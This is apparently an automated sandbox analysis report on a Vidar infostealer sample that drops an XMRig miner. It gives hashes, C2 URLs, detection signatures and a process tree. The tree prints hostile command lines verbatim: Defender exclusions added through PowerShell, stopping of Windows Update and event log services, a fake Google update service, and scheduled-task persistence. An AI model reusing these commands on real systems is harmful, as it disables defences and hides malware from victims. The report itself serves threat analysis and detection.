Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2024, 08:22 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe
-
Size
17.5MB
-
MD5
1603ae955d010896283442534a8ad39c
-
SHA1
90101b5164c138f227d7add871c1f629bd6d083d
-
SHA256
34d99b2a6ed62e5080c9448ab3728066c6db5f997212ef71bd2705c79b19fc09
-
SHA512
e1c8d2ba780d98ff7a845543d35fdf7a2f2092d66295d82cfa07a0d6b64dda58db913967e4f595538f43ac94e88d97e3bfb762205f5588a675ba9abd2ceadb9e
-
SSDEEP
98304:E33JumYT82ylgsN0Nbh0pgnu99UHxh+VU1KSmv+4mn:A8hggIuh+VUvmmn
Malware Config
Extracted
vidar
11
346a77fbabba142b23c256004b5a7c5d
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Signatures
-
Detect Vidar Stealer 16 IoCs
resource yara_rule behavioral2/memory/1980-1-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-4-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-7-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-8-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-17-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-18-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-34-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-35-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-51-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-52-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-74-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-75-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-82-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-86-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-87-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 behavioral2/memory/1980-268-0x0000000000E00000-0x0000000001075000-memory.dmp family_vidar_v7 -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral2/memory/724-191-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-193-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-196-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-195-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-194-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-190-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-197-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/724-199-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4072 powershell.exe 4996 powershell.exe 2224 powershell.exe 2296 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts HCFCAAEBGC.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation service.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation CGCFBFBGHD.exe -
Executes dropped EXE 5 IoCs
pid Process 2344 HCFCAAEBGC.exe 764 CGCFBFBGHD.exe 4180 Updater.exe 2600 Updater.exe 2212 service.exe -
Loads dropped DLL 2 IoCs
pid Process 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 96 pastebin.com 51 bitbucket.org 52 bitbucket.org 89 pastebin.com 90 pastebin.com 95 pastebin.com -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5036 powercfg.exe 4144 powercfg.exe 532 powercfg.exe 1052 powercfg.exe 4308 powercfg.exe 4972 powercfg.exe 3352 powercfg.exe 5032 powercfg.exe 696 powercfg.exe 2384 powercfg.exe 4804 powercfg.exe 312 powercfg.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe HCFCAAEBGC.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3672 set thread context of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 4180 set thread context of 3388 4180 Updater.exe 150 PID 4180 set thread context of 724 4180 Updater.exe 152 PID 2600 set thread context of 1220 2600 Updater.exe 181 -
resource yara_rule behavioral2/memory/724-186-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-191-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-193-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-196-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-195-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-194-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-190-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-189-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-187-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-185-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-188-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-197-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/724-199-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4948 sc.exe 2760 sc.exe 2608 sc.exe 1936 sc.exe 2588 sc.exe 3100 sc.exe 3344 sc.exe 3432 sc.exe 4392 sc.exe 4852 sc.exe 2580 sc.exe 4740 sc.exe 756 sc.exe 388 sc.exe 2504 sc.exe 3560 sc.exe 2956 sc.exe 3268 sc.exe 4896 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CGCFBFBGHD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2312 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1020 schtasks.exe 4448 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 1980 BitLockerToGo.exe 2344 HCFCAAEBGC.exe 4072 powershell.exe 4072 powershell.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 2344 HCFCAAEBGC.exe 4180 Updater.exe 4996 powershell.exe 4996 powershell.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 4180 Updater.exe 3388 conhost.exe 2224 powershell.exe 2224 powershell.exe 3388 conhost.exe 2600 Updater.exe 2296 powershell.exe 2296 powershell.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 2600 Updater.exe 1220 explorer.exe 1220 explorer.exe 1220 explorer.exe 1220 explorer.exe 1220 explorer.exe 1220 explorer.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4972 powercfg.exe Token: SeCreatePagefilePrivilege 4972 powercfg.exe Token: SeShutdownPrivilege 696 powercfg.exe Token: SeCreatePagefilePrivilege 696 powercfg.exe Token: SeShutdownPrivilege 3352 powercfg.exe Token: SeCreatePagefilePrivilege 3352 powercfg.exe Token: SeShutdownPrivilege 5032 powercfg.exe Token: SeCreatePagefilePrivilege 5032 powercfg.exe Token: SeDebugPrivilege 4996 powershell.exe Token: SeShutdownPrivilege 4144 powercfg.exe Token: SeCreatePagefilePrivilege 4144 powercfg.exe Token: SeShutdownPrivilege 5036 powercfg.exe Token: SeCreatePagefilePrivilege 5036 powercfg.exe Token: SeShutdownPrivilege 532 powercfg.exe Token: SeCreatePagefilePrivilege 532 powercfg.exe Token: SeLockMemoryPrivilege 724 explorer.exe Token: SeShutdownPrivilege 2384 powercfg.exe Token: SeCreatePagefilePrivilege 2384 powercfg.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeShutdownPrivilege 1052 powercfg.exe Token: SeCreatePagefilePrivilege 1052 powercfg.exe Token: SeShutdownPrivilege 4308 powercfg.exe Token: SeCreatePagefilePrivilege 4308 powercfg.exe Token: SeShutdownPrivilege 312 powercfg.exe Token: SeCreatePagefilePrivilege 312 powercfg.exe Token: SeShutdownPrivilege 4804 powercfg.exe Token: SeCreatePagefilePrivilege 4804 powercfg.exe Token: SeLockMemoryPrivilege 1220 explorer.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 3672 wrote to memory of 1980 3672 2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe 87 PID 1980 wrote to memory of 2344 1980 BitLockerToGo.exe 92 PID 1980 wrote to memory of 2344 1980 BitLockerToGo.exe 92 PID 1980 wrote to memory of 764 1980 BitLockerToGo.exe 94 PID 1980 wrote to memory of 764 1980 BitLockerToGo.exe 94 PID 1980 wrote to memory of 764 1980 BitLockerToGo.exe 94 PID 764 wrote to memory of 2564 764 CGCFBFBGHD.exe 95 PID 764 wrote to memory of 2564 764 CGCFBFBGHD.exe 95 PID 764 wrote to memory of 2564 764 CGCFBFBGHD.exe 95 PID 2564 wrote to memory of 1020 2564 cmd.exe 97 PID 2564 wrote to memory of 1020 2564 cmd.exe 97 PID 2564 wrote to memory of 1020 2564 cmd.exe 97 PID 3612 wrote to memory of 4484 3612 cmd.exe 105 PID 3612 wrote to memory of 4484 3612 cmd.exe 105 PID 4488 wrote to memory of 1644 4488 cmd.exe 136 PID 4488 wrote to memory of 1644 4488 cmd.exe 136 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 3388 4180 Updater.exe 150 PID 4180 wrote to memory of 724 4180 Updater.exe 152 PID 4180 wrote to memory of 724 4180 Updater.exe 152 PID 4180 wrote to memory of 724 4180 Updater.exe 152 PID 4180 wrote to memory of 724 4180 Updater.exe 152 PID 4180 wrote to memory of 724 4180 Updater.exe 152 PID 3524 wrote to memory of 2580 3524 cmd.exe 164 PID 3524 wrote to memory of 2580 3524 cmd.exe 164 PID 2600 wrote to memory of 1220 2600 Updater.exe 181 PID 2600 wrote to memory of 1220 2600 Updater.exe 181 PID 2600 wrote to memory of 1220 2600 Updater.exe 181 PID 2600 wrote to memory of 1220 2600 Updater.exe 181 PID 2600 wrote to memory of 1220 2600 Updater.exe 181 PID 1980 wrote to memory of 3244 1980 BitLockerToGo.exe 182 PID 1980 wrote to memory of 3244 1980 BitLockerToGo.exe 182 PID 1980 wrote to memory of 3244 1980 BitLockerToGo.exe 182 PID 3244 wrote to memory of 2312 3244 cmd.exe 184 PID 3244 wrote to memory of 2312 3244 cmd.exe 184 PID 3244 wrote to memory of 2312 3244 cmd.exe 184 PID 2212 wrote to memory of 4952 2212 service.exe 186 PID 2212 wrote to memory of 4952 2212 service.exe 186 PID 2212 wrote to memory of 4952 2212 service.exe 186 PID 4952 wrote to memory of 4448 4952 cmd.exe 188 PID 4952 wrote to memory of 4448 4952 cmd.exe 188 PID 4952 wrote to memory of 4448 4952 cmd.exe 188
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\ProgramData\HCFCAAEBGC.exe"C:\ProgramData\HCFCAAEBGC.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2344 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4484
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4392
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2504
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:4852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:3344
-
-
-
C:\ProgramData\CGCFBFBGHD.exe"C:\ProgramData\CGCFBFBGHD.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1020
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AAFHIIDHJEBF" & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2312
-
-
-
-
C:\ProgramData\GoogleUP\Chrome\Updater.exeC:\ProgramData\GoogleUP\Chrome\Updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
